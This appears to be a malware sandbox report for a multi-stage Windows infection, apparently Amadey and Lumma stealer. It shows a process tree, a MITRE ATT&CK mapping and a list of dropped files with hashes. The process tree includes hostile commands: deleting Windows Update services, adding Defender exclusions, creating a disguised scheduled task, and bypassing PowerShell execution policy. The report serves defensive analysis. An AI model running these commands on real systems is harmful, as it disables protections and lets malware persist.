"C:\Windows\System32\cmd.exe" /c taskkill /im "inte.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\Files\inte.exe" & exit
1⤵
PID:11964
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /im "inte.exe" /f
  2⤵
  - Kills process with taskkill
  PID:6244

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:9512
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:10444
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:10236

C:\Windows\System32\sc.exe
sc stop UsoSvc
1⤵
- Launches sc.exe
PID:8856

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
1⤵
PID:11648

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
1⤵
- Launches sc.exe
PID:11188

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:11300

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "WindowsAutHost"
1⤵
PID:8840

C:\Windows\System32\sc.exe
sc stop wuauserv
1⤵
- Launches sc.exe
PID:10796

C:\Users\Admin\AppData\Local\Temp\Files\12cc22da6901d5fc26e8f2d3ee79a1c346f83a7ae43e25d1384e1df23d9adb69.exe
"C:\Users\Admin\AppData\Local\Temp\Files\12cc22da6901d5fc26e8f2d3ee79a1c346f83a7ae43e25d1384e1df23d9adb69.exe"
1⤵
PID:10272

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /tn "WindowsAutHost" /xml "C:\Users\Admin\AppData\Local\Temp\vdsysklwvhji.xml"
1⤵
- Creates scheduled task(s)
PID:10076

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "WindowsAutHost"
1⤵
PID:8124

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
1⤵
PID:11728

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:12284
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:9884
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:5788

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:11024
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:12248
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
  2⤵
  PID:10964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:10032

C:\Program Files\7-Zip\Lang\runtime-bind.exe
"C:\Program Files\7-Zip\Lang\runtime-bind.exe"
1⤵
PID:12900

C:\Program Files (x86)\Common Files\Oracle\lsass.exe
"C:\Program Files (x86)\Common Files\Oracle\lsass.exe"
1⤵
PID:6108

C:\odt\OfficeClickToRun.exe
C:\odt\OfficeClickToRun.exe
1⤵
PID:12504

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -nologo -noprofile -noninteractive -executionpolicy bypass -command .\serverBrowser.ps1
1⤵
PID:12536

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.linkedin.com/login
1⤵
PID:8732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Scripting

T1064

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Common Files\Oracle\lsass.exe

Filesize
2.8MB

MD5
5f982586050f2719b001542408082ba6

SHA1
5c9234448525f100d7bf3f219076d3659f760b41

SHA256
9d8e1eadb096cc596099349e92a6b51d90fbd6011bb3ae9580c7968ebf4abaec

SHA512
0037cc01b26e40b105a8ed99bc01012618fde8b1961aa157f0f5f100b80eee7c3a9e4f11af1400bff1d96f1daf39525554b919174a07c172e692a6d208d3de69

Download Submit
C:\ProgramData\Microsoft\PSOBPDL.exe

Filesize
256KB

MD5
06d25bc4e8041b4b2bc0880f9bc313ca

SHA1
77bb2fbe48a609daebd811c1a76f7b7b0acbf99a

SHA256
89fa245ef567c3a5a9481bed27ec53d5cfefbd97cd7f0d49bd685b97f7b0f428

SHA512
dcf80541539fb040852b0bc2598bd68250f756122071d854cb49822f3d6c7fbd1edabbedbd18cb96bbaffa5458b39445b102515b8c48a568d67f38039722c3f2

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
5.0MB

MD5
a3fb2b623f4490ae1979fea68cfe36d6

SHA1
34bec167e0f95ecc36761f77c93c1229c2c5d1f4

SHA256
3bc9c1d7f87f71c9e98fac63c2f10d2651f51848082a85d6b3550649e4289d56

SHA512
370b23364bcf8f07aa951c1c6a9d6b03b516db8fd7444d25087ad8071c54bb06fd50ce311a205e0770211167728d86516e934a39a606f0bf0c9fbdd13dca7912

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
fd28635c4a77955b3a9220c554e5bb4a

SHA1
cfffc85d0efa6294fc5b1b2c433fb28afcc0f141

SHA256
795934cb93fa551a9ed98b29279df7343b4d20c4d097c210d4c5a0c834485ecd

SHA512
90e70939e2d1ea2110bfa9d8317d422f773693d63b3e87269d43a7e7e214ce2406737dbdea471b7bd14ebedd2119afa8a2150bca94c037d9adb641593fb0db83

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
ec6ebf35b479754f6b369898572dbb1f

SHA1
739056face02ed66ba01f0f8e72b654daac6b11c

SHA256
374c87a2635a50521b5fc8721ca861d160336350e61e13d10cafff6ffea9723c

SHA512
11892956f6f9d016592cd8ae9373a83047cf3ada373117dc73becab1a4d59cca3b633ec0f2f373c301313a247f873d544a542a0e5ae61a276f31bd23bcceb4c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lumma123142124.exe.log

Filesize
42B

MD5
84cfdb4b995b1dbf543b26b86c863adc

SHA1
d2f47764908bf30036cf8248b9ff5541e2711fa2

SHA256
d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b

SHA512
485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\more.exe.log

Filesize
1KB

MD5
0c2899d7c6746f42d5bbe088c777f94c

SHA1
622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1

SHA256
5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458

SHA512
ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
e33ed3d4cc9b2e5a08ae25747ef47620

SHA1
e2f4cfdd39bcb2eb1c05648a37a3d8536eaf19b7

SHA256
0e7093450fb6bb5201b4291033daf6099881421ab47b122972e0249ef5b45a4f

SHA512
9e990f7ca202c7ecc7a21dd2433055b71bd62f2e524f4702b674316effeb8fa37e891d40f3e6a960380dd7967033c7a7f235e73a3c434e97495e532309b4f95e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\fouette.ini

Filesize
44B

MD5
eb4da25d6c0d919bbe9ebc480cee0d05

SHA1
dfaeae9c23e9b282a82b1abb971599a5bcd51b27

SHA256
70a4ee88b132159f110d96ad83001187c6a272f52d5c766f563b50ac1e072fe3

SHA512
1e9972196d4bdbbc7366c1fc980014b3048d036f56afdeb39303263cc7af24217490dd9b9ca85ac11a0bf83a1c31eead3320e158e8b9ac819468023d1548cb5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
48KB

MD5
6021a0e818fbdd706fd8c5bc3937b734

SHA1
b1fe69abe9a0f46c27da6f677a1826bf55077f4d

SHA256
e3abe6748e53d421e12fa9b47905c4d37d791324bd971e8be1031ee0e3473ccf

SHA512
a822de98e843dbf6a00ae09c958267bed100501d515f62e5016a5ce58af52bdd4c9fe09b9415d4b4af5a857f0799903a323adf3cacdbb6786fa77d70d0848698

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
48KB

MD5
4656c3c7f41d0b2562d3876c7aabd60d

SHA1
0b58486d8de8170455dc6f972f6cdd601d47505f

SHA256
3a1246c86cddbbce27c22036ef02433e15bc4ffad0814175632c58f9ae03f260

SHA512
396708688099bb32d1df4b40a59a0d23cd5dcde79dcc7e6f1054bfc441dfde77edeac13ed4ea5d0c8081d446fd08b73a03fcc70bc020aef83daf97425d758266

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
48KB

MD5
af4dfb15e286e57a527ea7c9c592ba8d

SHA1
cd9f63284781ff442bd22b3b59bc76ba7b4dcc68

SHA256
91a5939ec6182a1762e47fab553d60cb59313e7fbf072264f29858f381fa281b

SHA512
2ee5981bbed0e5534fac139c28d84b19fadc77e652408833b25245d327bf5a84762441e576a42d94c786678fb24f0dcb42d753762d230c254414d4ea49c93481

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
48KB

MD5
d95960b78a4bc5a245defa4d71f0f3a8

SHA1
a8dd61e84e41778a87e9cce1b1a19abf704fad63

SHA256
7d56155adeec674dedc7f6a79600226d69e1cc66c8862332f6efa85122fbe0bd

SHA512
42f9c5e1d654803055e076d3fdf436e7d7606007cbcecd48adcfbefadd02844ec41143e59a177b196b96912963e8a93c9a952e0b8806f648d46d27bd169114b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
48KB

MD5
2509ca8021e540023f5bfca7c79299ae

SHA1
b9e0e4555c37ffe7195064eb8d426f4c64f4501d

SHA256
00519054c4468812b5d83542bd63d4a5b28b12804488c8e9ef7100f78b92976c

SHA512
ca9059d5ed20532ba5ca710eef914b0cc7bbeb6f76bfb51f3cf635527301b41fe2e00274bf18fe29498ee7e355cae9449203978a0cddd3058e2c5a9cdfcf5ed3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
48KB

MD5
6d25fde64cfd19da73529d9792302e6e

SHA1
02cb4a7783432c9e08b9f0d6b68a346272bed52b

SHA256
52faedd2c9a33cd34c48e9196bff6813a96fd8033a16da8ac1f8c1c2ca38d057

SHA512
8b74ca8cdc634ae2faa838844ff23fd89ff17862b08ceaf0e8b9e3dfff7c04fd287154e44e364f18c2df9f4e722f75cd4b0e852369b7f1344bd34f1943ca0f39

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
40faedd800e0bb08efaf1cb282b911f3

SHA1
7d29ccf4e358812e6aecb0731cf229d46195980e

SHA256
161ac1e0742a31ecb4628f885e390d5c75ead3dd9d39589c0f7915200931063b

SHA512
4d89089d9d6912daf51cf73ca139b3493f5b3dd2bd5fc313161ebfabea4edd54ccbba56672e362753587acd70d435e10f456e2a7acf03cc48345d97bdc9c274b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e1fbd62e1dc6671d8d1ce03d4f38a141

SHA1
9e30c848a2b348235310db8f0ebfea07b287c691

SHA256
0ba3f8ffb37b5c4d62421a522e58ec8b8b3bc51a98cabf2033c1a274f6368947

SHA512
45e9498e5dd68f22fc4ce0e50157224e00364da5c37494225e52b3daa0527b25f4ee62d7fc4d533f9905916ae42fe910a6e2d6bc8696a8ed0da5582decd085e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7df1babb72a3a3afdf33c0bd96f8d932

SHA1
e786871830f6dfcd1c6d8c5262fdfe4b4a8b551f

SHA256
d25050ec7dba24badfc2f5fc71954f006e1677c8189f88b0afbfb1df5f3ba605

SHA512
5d60db930c80cf755a928a434916a1b536015d59819a63a852e51be185469a2868d474aa39214bf708390e49be978e04e5ca4a7f7f80d3f7bc7c79b169feffd8

Download Submit
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe

Filesize
512KB

MD5
d78064b9ae910196e1dbfb00c778c9ab

SHA1
3ee6888e0729fc56a62efa54157ccc1d800367a4

SHA256
225077d5a45f9b3f0c9869cfa17135eef8dd76f432684af0e81dccf38d351031

SHA512
c5d0ea0ddd0c5eeaf5b62a9f68a3f9769b569d2686a3aeda94ea3a5c37089fdfbb00cdaf28cf5bbaecebee98dbc041ca5a1ab5be0fef37ff85288a73843ec5a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000018001\goldman1234.exe

Filesize
768KB

MD5
95178667fcbebec17e1793582293cec8

SHA1
6ee86b66584345d057aec3e0590e4c56a173ac7c

SHA256
f21c672c3dab55b753a7fcc7a03ce65a80a70d727c816cc37a4c7c90ec1f153a

SHA512
7344c95eaec544e1e66b5cb6a0cac9b31a653b7cae9920f63fc8c42dc11678843a07c69acd8fde7b43644763f6df0f85e68f78ecfae04b90475265bd810e65f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000030041\do.ps1

Filesize
922B

MD5
d769ca0816a72bacb8b3205b4c652b4b

SHA1
4072df351635eb621feb19cc0f47f2953d761c59

SHA256
f4cc3a4606856fd811ecbcdf3fc89fa6418a1b3c8f56ca7ff5717713e8f806a2

SHA512
cf13fd667e71707d63d394391b508f5a1ee5ffa7ac27fe35906e15059e9fccc8ad61e91ce3ffd537e8daa0f6306d130997e9b448a4466407fa0c894917850b64

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000031001\fu.exe

Filesize
320KB

MD5
c32c742095ea8ebdc495cb02a5b30e93

SHA1
d820282c0a611f10d5f130ed6e34ea5d9a39f149

SHA256
29a38529435fa127428d272ce2944dc1852d33565947876036073052c8f07213

SHA512
2af2682339c864e78cc39d46dfaf35bb8dee600300eb1c03e2b72225063ee13da44b8d08bb723df6c3efa51019a6a248673bd68b876c242fdad46c9ffc3dbddf

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000032001\ladas.exe

Filesize
576KB

MD5
f7f16b96b1f7177a0717d214be933b56

SHA1
d1122bb97a9be762629f488738cef7b51a1c86cd

SHA256
ecf7f085ef4cb9fffc50aea2da6891c5ece100c1692b746458daf58f5e09f321

SHA512
e8e39aa8c5b2f89171bf0606ea894da91fbf8f8e1809eb74bfa815f5a0f1e9a5a0806b34aa6c7165020d91888edb28882be7434b431f9843589206affbca5929

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000121001\Amadey.exe

Filesize
413KB

MD5
d467222c3bd563cb72fa49302f80b079

SHA1
9335e2a36abb8309d8a2075faf78d66b968b2a91

SHA256
fedb08b3ec7034a15e9dee7ed4dec1a854fb78e74285e1ee05c90f9e9e4f8b3e

SHA512
484b6c427e28193ddb73dd7062e2bfbd132ddc72ce4811bfe08784669de30e4b92bc27140373f62a4ce651401000a3c505188620c43da410bf6b0799a0791fa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000153001\for.exe

Filesize
384KB

MD5
61231720927ffe881c7ef3b1da462967

SHA1
3a994cc04ff1ec082868b8bc00d41c4c5437f209

SHA256
81e46ebc4bf38913059216f41dcbcd96da03c26a9ff7dbd33e0ad26e2cf5c011

SHA512
f45ed6da5a821db296bcf1e4933d8d6e46bbc9552ea78bbde31b7bce44bb869510a821ea5ac76922babf8205018b373c332a3116c1b26566279f4da84694ef6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000174001\Goldprime.exe

Filesize
128KB

MD5
c60b77e17e6c4f0933db17b77995cff6

SHA1
fd398501e495f6d750ffa5c727ed1954dcb1c9d4

SHA256
926ef9cd2bf5fb1eb9b5e65544421a06048c96ceac397c0a4715afd81f8b34aa

SHA512
efb28e986c2fd6ff25a71b9f0b9272f048426ddac470ca0c6e1582ae49cee8899e0b3a0a580ca0abb0dccb4e8973d84a27a2ec7e8dffdef6951cbac1f345aea8

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000175001\dayroc.exe

Filesize
640KB

MD5
7a14fa95453ca221b130123bc01788c6

SHA1
5ff62236cf3399928f66b5e83544abaf089f55df

SHA256
65e6a8ef82faa0e1e3cb15218fed42fcbbbfbdd4a62f3fc5410cfda662a25488

SHA512
ace4abcc600e7a23dfa1caa33a6038f63595e2c81c14856b8fd25181c9d7f5d8238826be887a00789eb4492ab0942fff0cecdd0dd2c79cce46f4af432adc365f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000178001\newfilelunacy.exe

Filesize
539KB

MD5
c1982b0fb28f525d86557b71a6f81591

SHA1
e47df5873305fbcdb21097936711442921cd2c3b

SHA256
3bab5e1befbdc895d9e36e76cb9a40e59de61a34109c36ed26d7dedcd5db3080

SHA512
46dcabbfb57b3665faa76bc6f58b6f252934788acabbf2ba75263d42cac8c013f6feb5992a7043123842a609bdd1b3084f2f0c8b192c2b219b87274d29f8c432

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000186001\monetkamoya.exe

Filesize
320KB

MD5
f4ff61e37e9c2f7a1481df1b6a9a20bd

SHA1
cbd96e8ae519f18b8c692536e8d37258d48f4b36

SHA256
1641f51809caadd241b3fdfdbf01a8571370221f6c124e10f4f1fd6eca0cfd5c

SHA512
d728a2bba1c8f564a73acd0ee6a54a56bb8d6639df83baff9c534d7f862076085b17d2e27e4f8744f5d9483123b29343ed006f6556af2d59b0abd026a9b9e30f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000199001\joekr1234.exe

Filesize
256KB

MD5
2026f84a2ce9c7b2d4272dbde29b4698

SHA1
dc058772aa0ee6b9d6cee1aa0d79f317cf2b2f88

SHA256
759182f4a3349400157f2303eb3a45ec04b08318cd2378079a361c6a2bf2fb60

SHA512
5566613be03fe24bdda6f33aaae497e75cbaa2336fb24c78821a4c0848fa50df0f0f95aba894026c8833a849e1f9dca10abbf7637f73c4803065ad397f0f0b72

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000202001\lumma123142124.exe

Filesize
600KB

MD5
cad41f50c144c92747eee506f5c69a05

SHA1
f08fd5ec92fd22ba613776199182b3b1edb4f7b2

SHA256
1ac5eed2f7fc98b3d247240faa30f221f5692b15ea5b5c1eba3390709cb025c6

SHA512
64b89f3a3b667cd81f33985db9c76ffd0bb716ce8ed93f97c24d3c20e7236d91d02af9371a26d41f55b564702bd1f6fd7489055868fcd1610c04beb79ae8c045

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000203001\new.exe

Filesize
64KB

MD5
806ced1a1ea79a709ae5fa3395cba610

SHA1
87628398e2c640dec3ea19f976f23fd93d1c3ce8

SHA256
a5b23a6647ed8eddd382e1a5429597b6949353da62ff0175ee64055a1e99c9f6

SHA512
eec8f6b875ccd664faef61789ca7483276170ce580429109c7a1fba4222b843aa33b934a218da4a242e848ec5422c5c4a395669548f1d96056673a812ba8d57b

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000204001\File300un.exe

Filesize
38KB

MD5
f716ac517b9fa8ccd978d490449b1412

SHA1
850c41469535f3004bf260defce644f4dbeab975

SHA256
765482412bac6561f49c22b59fb7e9403655f63f102ee0336e89cb242ac0d2e5

SHA512
aafdf78ebd2ae7ff45c4368b34972cf76513113b1a5d6756ee449c415ba647b0c82dd5ddd4f04ff2312dc430745ed581ac222220ecdeb37eeb8f6c955ace4cb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Carmind.ini

Filesize
52B

MD5
16d2907f72ba61bcf429972b96cb4069

SHA1
9e4b5b253fd60f5af867610a6e0861ca0e426456

SHA256
5fe8b9c597b96a9a541903505adb7899b7ed6b444c2f7d11913e836d66711448

SHA512
fcd064fb6fcb9e4b3184348671e2f3db3c4419abc02248151bde2654e30ce840c04a7410196a55eba39885ffa44335bdc18c9849972fe18a528f35787d57679c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe

Filesize
268KB

MD5
de45ebaf10bc27d47eb80a485d7b59f2

SHA1
ba534af149081e0d1b8f153287cd461dd3671ffd

SHA256
a746597e9b0877a8a6d4d919279045bfea2801d74348b034f222466c2200ea21

SHA512
9228255ae7df9c3a332cce8451cf9298298f4f3aab8a25fe334258d76f11cd2bdb069452381cfa68ec46b16a7371dd1e9ad6dfd69c293f068422eae953f2f22a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe

Filesize
186KB

MD5
f860af5023bb4c506c6ffa3a3299aa1d

SHA1
d30da4a86ae41383f28e2757912123923fd142e9

SHA256
659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2

SHA512
9c1a7b2c70d72095903c95954e3daa7b188ca8905443815009266a61f44d6d2cec7dd4b63ee3480a2cc6f74b97d9d3f8dba8487cabb6eefd0a58f013544f8eda

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\PCclear_Eng_mini.exe

Filesize
32KB

MD5
b41541e6a56a4b091855938cefc8b0f0

SHA1
8006b2728d05eab4c5d6dc0bb3b115ddc1e2eaa7

SHA256
d4c48762f128436fed18b9c714e55bf7360802127efb233ad31ec4b0f7f649b1

SHA512
a3c2b5dddbb5b8ded63e04672610287458b4bed6ea054e45804e612a2896d92412ef632c621a49b445412d8998a5edc914b055502e22fcfe0e178e5098b64828

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\T1_Net.exe

Filesize
55KB

MD5
59ed620b90318c77ec464b22ab444334

SHA1
af50740c95c6c296eac9a374514ffc587de01a56

SHA256
59e406a485ddf4939e97ec5d08595fe343ab970681ee7d02c2f7dfb97e75e956

SHA512
bd5bd7758a114a389dcf26487a41d08c02097dab7eeda6037b269bd63b2d6893df91a995156be5496179fa18615614e70c000faed10bd6620269b5ed9aea5efe

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe

Filesize
1.4MB

MD5
04055601abbd16ec6cc9e02450c19381

SHA1
420bd7c7cad59f1b7cdd2c8a64282ef6f06cfe6e

SHA256
b7620bff5539ff22c251c32e62961beae4f5a91b0f6c73dde1a7da941b93fe13

SHA512
826c13cf6a37c561fb9052b3a0a7424df7d2fe424fe8c3783440c4483aa46a2cf1e4c275c7c080a130e178c7ac3221bb9224126ef4ab0bee38c24b12fa2a70ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe

Filesize
638KB

MD5
6bcae49071cc13d2b8b846aa23ea2954

SHA1
56038ece3d314906baf7cbb3ab8ca21d4384ea6f

SHA256
7d4ae88ed0abd9a4f1eab2e2619aefbc116c9b26bcec7a2e55121a263f35d030

SHA512
207c68698004e97c1b9f477d94090127a1db030f2ea84ee20bd74124a25c4a8e284ac9236e4cf0bbe106f7a4088b362a1d239287e8f5108b48fca0f9d4c2ef23

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\asas.exe

Filesize
443KB

MD5
5ac25113feaca88b0975eed657d4a22e

SHA1
501497354540784506e19208ddae7cc0535df98f

SHA256
9a0d8a0fc3c799da381bc0ca4410fd0672f0a8b7c28c319db080325f4db601fe

SHA512
769fa8c71855ba1affc7851d394fd6870e01ab8a5e5ee9ab5e63290708b3233e1b0a47185a13d2e52d29917c5b40f8adedb1efc3305b1cdf31802b4c796a25aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe

Filesize
64KB

MD5
d2c8ab0106d33d9a0b1fd939198f4224

SHA1
53ef0dbc5735486a5b8288a16e77fb71a967ba8c

SHA256
1a0a89b5faf16dac66cf7f64767b41cb6d41bea97b37b8c56b17d79da99390c9

SHA512
e5707b62186cd62c45951005681065ac87a62fb1400693205e5639dc7f453a09b8b85422320dfa697c36447d8a7b74e812443800bf0c84f038ae42709fdd68c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\brg.exe

Filesize
583KB

MD5
02507b95893999b16316c4e5f0ab7177

SHA1
d7410bffdadce380f8de9d80b7ef9bca1f7f718f

SHA256
d2d0fee1cc3470452d8f7a09af5457e0c9de767e0902eebfd879d35715fe829a

SHA512
359a8e749004fd603a3a0c9077a76271d99b049362516167ece01dd244df3c06e5aef9c8001e12156f02dde32df55cf1658e0711036e69d1d11ab5c15fee7bd3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\daissss.exe

Filesize
421KB

MD5
10a331a12ca40f3293dfadfcecb8d071

SHA1
ada41586d1366cf76c9a652a219a0e0562cc41af

SHA256
b58eec6e5aabc701404d5b5556c86fff5cc103c69eeda00061e838c4f122288f

SHA512
1a5b8e77ddbab97bb4c848adbcd7dbfb9ca84307d1844dba9572fcea48a2cbb091a3fc52663b87568416adf18a1338adc07aab0bd5f1ab36a03c8ff8a035d399

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\flt_shovemydiscoupyourarse.exe

Filesize
28KB

MD5
1f877b8498c53879d54b2e0d70673a00

SHA1
60adf7aaa0d3c0827792016573d53d4296b21c18

SHA256
a399a577164bba13568d68d4ad05c4a2a6eda71bc97e5f1edb5462371330473f

SHA512
b19ebdf8ed9ec9d3885d0d003c556d0dd04b81d5d1f22aff8a987aeaf76977d52bb7a43ec68786b5e68b97f3658e0856a582670835d37ba57e38b9f8d8adc96e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\fortnite2.exe

Filesize
1.5MB

MD5
1eb611dcb30106eec15555718e953cff

SHA1
e3a0ab3349210029e2f1fd01712dddeaba19c6a0

SHA256
45459279d0e4ad96a22ac1c3653ada56cd4490bd12d66e0567d62c62653ed390

SHA512
2484760adf17d18f0fbc18b6adf27954f469cf8664a2dd96da8bae379977464fcf8750d7530b40ac8de36a4b4652eac2b81be5a308d6e660709c0725fd5425a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\hv.exe

Filesize
1.2MB

MD5
c8ef63e2b9095c768a951f72c23f5a3c

SHA1
e5a64f856fe1da12e2c99f1e47d776c619769ff9

SHA256
a1c6a1ce116fc0ccbb2c33b9388eb5b5908fc052275826fc729cfd97717b9c22

SHA512
b071c742a5d1448e35eeaa0cacaa16573cf691fc799c0025721961a921775cf3edd4ab76b3044e5fa7bbd6f32580f97f392ecdc0af40c667d53d2109adf619fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\hv.exe

Filesize
1.4MB

MD5
45e60919678c93e444d2a484e70bb547

SHA1
9759a8ff8422ec7349565c032b8eead1d3df9400

SHA256
9130f730e87adf116ee186cf31ae83eadf35c61d2fff489adf4fa71d02f2e52c

SHA512
